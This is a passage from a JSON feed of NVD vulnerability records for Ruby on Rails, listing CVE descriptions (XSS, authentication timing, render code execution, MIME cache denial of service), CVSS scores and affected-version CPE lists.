["CVE-2016-0752", "CVE-2016-2097"], "modified": "2019-08-08T15:43:00", "id": "CVE-2016-2097", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2097", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-09T14:15:48", "description": "Cross-site scripting (XSS) vulnerability in Action View in Ruby on Rails 3.x before 3.2.22.3, 4.x before 4.2.7.1, and 5.x before 5.0.0.1 might allow remote attackers to inject arbitrary web script or HTML via text declared as \"HTML safe\" and used as attribute values in tag handlers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", 
"integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-09-07T19:28:00", "type": "cve", "title": "CVE-2016-6316", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2019-08-08T15:43:00", "id": "CVE-2016-6316", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6316", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-09T02:44:16", "description": "The http_basic_authenticate_with method in actionpack/lib/action_controller/metal/http_authentication.rb in the Basic Authentication implementation in Action Controller in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not use a constant-time algorithm for verifying credentials, which makes it easier for remote attackers to bypass authentication by measuring timing differences.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-02-16T02:59:00", "type": "cve", "title": "CVE-2015-7576", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 
8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2019-08-08T15:43:00", "cpe": ["cpe:/a:rubyonrails:rails:4.1.1", "cpe:/a:rubyonrails:rails:4.0.6", "cpe:/a:rubyonrails:rails:4.2.5", "cpe:/a:rubyonrails:rails:4.0.10", "cpe:/a:rubyonrails:rails:4.1.7", "cpe:/a:rubyonrails:rails:4.2.0", "cpe:/a:rubyonrails:rails:4.1.2", "cpe:/a:rubyonrails:rails:4.1.0", "cpe:/a:rubyonrails:rails:4.0.8", "cpe:/a:rubyonrails:rails:4.0.7", "cpe:/a:rubyonrails:ruby_on_rails:4.0.11", "cpe:/a:rubyonrails:rails:5.0.0", "cpe:/a:rubyonrails:rails:4.0.3", "cpe:/a:rubyonrails:rails:4.1.12", "cpe:/a:rubyonrails:rails:4.1.4", "cpe:/a:rubyonrails:rails:4.1.10", "cpe:/a:rubyonrails:ruby_on_rails:4.0.11.1", "cpe:/a:rubyonrails:ruby_on_rails:4.0.12", "cpe:/a:rubyonrails:ruby_on_rails:4.0.10", "cpe:/a:rubyonrails:ruby_on_rails:3.2.22", "cpe:/a:rubyonrails:rails:4.0.0", "cpe:/a:rubyonrails:rails:4.1.6", "cpe:/a:rubyonrails:rails:4.2.3", "cpe:/a:rubyonrails:ruby_on_rails:4.0.13", "cpe:/a:rubyonrails:rails:4.2.4", "cpe:/a:rubyonrails:rails:4.0.4", "cpe:/a:rubyonrails:rails:4.0.2", "cpe:/a:rubyonrails:rails:4.1.9", "cpe:/a:rubyonrails:rails:4.0.1", "cpe:/a:rubyonrails:rails:4.2.1", "cpe:/a:rubyonrails:rails:4.1.7.1", "cpe:/a:rubyonrails:rails:4.1.8", "cpe:/a:rubyonrails:rails:4.1.5", "cpe:/a:rubyonrails:rails:4.2.2", "cpe:/a:rubyonrails:rails:4.0.5", "cpe:/a:rubyonrails:rails:4.1.3", "cpe:/a:rubyonrails:rails:4.1.14", "cpe:/a:rubyonrails:ruby_on_rails:4.1.11", "cpe:/a:rubyonrails:rails:4.0.9", "cpe:/a:rubyonrails:rails:4.1.13"], "id": "CVE-2015-7576", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7576", "cvss": 
{"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:rubyonrails:rails:4.1.10:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.12:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.9:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:rubyonrails:rails:4.1.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.10:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.13:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc2:*:*:*:*:*:*", 
"cpe:2.3:a:rubyonrails:rails:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.13:rc1:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:06:31", "description": "Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-04-07T23:59:00", "type": "cve", "title": "CVE-2016-2098", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": 
"2019-08-08T15:43:00", "cpe": ["cpe:/a:rubyonrails:rails:4.1.0", "cpe:/a:rubyonrails:rails:4.1.12", "cpe:/a:rubyonrails:rails:4.2.0", "cpe:/a:rubyonrails:rails:4.0.6", "cpe:/a:rubyonrails:rails:4.2.5", "cpe:/a:rubyonrails:rails:4.0.10", "cpe:/a:rubyonrails:rails:4.0.2", "cpe:/a:rubyonrails:rails:4.0.5", "cpe:/a:rubyonrails:rails:4.2.1", "cpe:/a:rubyonrails:rails:4.1.1", "cpe:/a:rubyonrails:rails:4.1.8", "cpe:/a:rubyonrails:rails:4.2.2", "cpe:/a:rubyonrails:rails:4.0.3", "cpe:/a:rubyonrails:rails:4.1.7.1", "cpe:/a:rubyonrails:rails:4.2.4", "cpe:/a:rubyonrails:rails:4.0.4", "cpe:/a:rubyonrails:rails:4.1.14", "cpe:/a:rubyonrails:rails:4.1.2", "cpe:/a:rubyonrails:rails:4.1.6", "cpe:/a:rubyonrails:rails:4.0.7", "cpe:/a:rubyonrails:rails:4.1.7", "cpe:/a:rubyonrails:rails:4.2.5.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:rubyonrails:rails:4.1.3", "cpe:/a:rubyonrails:rails:4.2.3", "cpe:/a:rubyonrails:rails:4.1.5", "cpe:/a:rubyonrails:rails:4.1.9", "cpe:/a:rubyonrails:rails:4.0.0", "cpe:/a:rubyonrails:ruby_on_rails:4.1.14.1", "cpe:/a:rubyonrails:rails:4.1.10", "cpe:/a:rubyonrails:rails:4.0.9", "cpe:/a:rubyonrails:rails:4.1.4", "cpe:/a:rubyonrails:rails:4.0.1", "cpe:/a:rubyonrails:ruby_on_rails:3.2.22.1", "cpe:/a:rubyonrails:rails:4.1.13", "cpe:/a:rubyonrails:rails:4.0.8"], "id": "CVE-2016-2098", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2098", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:rubyonrails:rails:4.1.10:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc4:*:*:*:*:*:*", 
"cpe:2.3:a:rubyonrails:rails:4.0.6:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.13:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc1:*:*:*:*:*:*", 
"cpe:2.3:a:rubyonrails:rails:4.1.10:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.9:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.12:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:rc2:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:00:09", "description": "actionpack/lib/action_dispatch/http/mime_type.rb in Action Pack in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not properly restrict use of the MIME type cache, which allows remote attackers to cause a denial of service (memory consumption) via a crafted HTTP Accept header.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-16T02:59:00", "type": "cve", "title": "CVE-2016-0751", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0751"], "modified": "2019-08-08T15:43:00", "cpe": ["cpe:/a:rubyonrails:rails:4.1.0", "cpe:/a:rubyonrails:rails:4.1.12", "cpe:/a:rubyonrails:rails:4.2.0", "cpe:/a:rubyonrails:rails:4.0.6", "cpe:/a:rubyonrails:rails:4.2.5", "cpe:/a:rubyonrails:ruby_on_rails:4.0.12", "cpe:/a:rubyonrails:rails:4.0.10", "cpe:/a:rubyonrails:rails:4.0.2", "cpe:/a:rubyonrails:rails:4.0.5", "cpe:/a:rubyonrails:rails:4.2.1", "cpe:/a:rubyonrails:rails:4.1.1", "cpe:/a:rubyonrails:rails:4.1.8", "cpe:/a:rubyonrails:rails:4.2.2", "cpe:/a:rubyonrails:ruby_on_rails:4.1.11", "cpe:/a:rubyonrails:ruby_on_rails:4.0.13", "cpe:/a:rubyonrails:rails:4.0.3", "cpe:/a:rubyonrails:rails:4.2.4", "cpe:/a:rubyonrails:rails:4.0.4", "cpe:/a:rubyonrails:rails:4.1.2", "cpe:/a:rubyonrails:rails:4.1.6", "cpe:/a:rubyonrails:rails:4.0.7", "cpe:/a:rubyonrails:rails:4.1.7", "cpe:/a:rubyonrails:ruby_on_rails:4.0.11.1", "cpe:/a:rubyonrails:rails:4.1.3", "cpe:/a:rubyonrails:ruby_on_rails:4.0.10", "cpe:/a:rubyonrails:rails:4.2.3", "cpe:/a:rubyonrails:rails:4.1.5", "cpe:/a:rubyonrails:rails:5.0.0", "cpe:/a:rubyonrails:rails:4.1.9", "cpe:/a:rubyonrails:rails:4.0.0", "cpe:/a:rubyonrails:rails:4.1.10", "cpe:/a:rubyonrails:ruby_on_rails:3.2.22", 
"cpe:/a:rubyonrails:rails:4.0.9", "cpe:/a:rubyonrails:rails:4.1.4", "cpe:/a:rubyonrails:rails:4.0.1", "cpe:/a:rubyonrails:rails:4.1.13", "cpe:/a:rubyonrails:rails:4.0.8", "cpe:/a:rubyonrails:ruby_on_rails:4.0.11"], "id": "CVE-2016-0751", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0751", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:rubyonrails:rails:4.0.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.13:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc4:*:*:*:*:*:*", 
